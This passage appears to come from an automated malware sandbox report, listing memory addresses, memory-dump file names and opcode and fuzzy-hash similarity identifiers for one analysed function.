                                                              0x00acfe1f
                                                              0x00afed25
                                                              0x00afed86
                                                              0x00000000
                                                              0x00000000
                                                              0x00afed91
                                                              0x00afed95
                                                              0x00afed95
                                                              0x00afed9a
                                                              0x00afedad
                                                              0x00afedb3
                                                              0x00afedba
                                                              0x00afedc4
                                                              0x00afedc9
                                                              0x00000000
                                                              0x00afedcc
                                                              0x00afed2a
                                                              0x00afed55
                                                              0x00000000
                                                              0x00000000
                                                              0x00afed61
                                                              0x00afed66
                                                              0x00afed6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00afed7d
                                                              0x00000000
                                                              0x00afed7d
                                                              0x00afed30
                                                              0x00000000
                                                              0x00000000
                                                              0x00afed3c
                                                              0x00afed43
                                                              0x00afed4b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID:
                                                              • API String ID: 3965848254-0
                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction ID: d2eb26b27b49af0159d810e00b61aa7701485f9467295a054719b86b94da14f4
                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction Fuzzy Hash: A6917E31E0024AEFDF28CF98C845BAEB7B6EF55305F25807EE511A7162E7305A41DB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%